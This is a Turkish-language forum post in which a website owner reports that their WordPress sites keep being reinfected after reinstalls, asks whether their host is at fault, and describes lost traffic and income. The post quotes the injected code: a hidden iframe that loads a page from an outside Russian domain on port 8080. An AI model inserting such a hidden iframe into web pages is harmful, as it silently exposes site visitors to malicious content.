iyi geceler arkadaşlar,

2 gün önce hitli bir siteme giriş yaptığımda index.php dosyası hata verdi. dosyaya baktığımda aşağıdaki kod dosyalara bulaşmış.

<iframe src="http://x8e.ru:8080/index.php" width=176 height=188 style="visibility: hidden"></iframe>
daha sonra diğer sitelere baktığımda diğer 5 kadar siteye de bulaşmış. tek tek hepsine tekrar wordpress kurdum.

aradan 3 saat geçmedi tekrar bulaştı kodlar. sinirlenip hosttaki hemen hemen bütün dosyaları sildim. bilgisayarımda virüs olduğubu düşünüp, bugüne kadar topladığım doküman, program, müzik ne varsa hepsini kaybetmeyi göze alıp format ve partisyonları yeniden oluşturdum.

Tekrar 10 kez yeniden wordpress kurdum. tabi yazı eklerinin önemli bir kısmınıı kaybettim ve geçersiz link olan yazıları da sildim.

tabi artık kurtulduğumu düşünürken, tekrar bir siteye baktım aynı IFrame konu var. bu nasıl olur? Bilgisayarımda virus olması imkansız. Ben bugüne Crac.k, Keyge.n vs li program falan da kullanmadım.

İşin ilginci BluHosttaki sildiğim klasörler geri gelmiş, bu nasıl oluyor? Hostla ilgili bir sorun olabilir mi?

Hitlerim ve gelir 2 günde yarı yarıya düştü. Web yayıncılığını bırakmak üzereyim.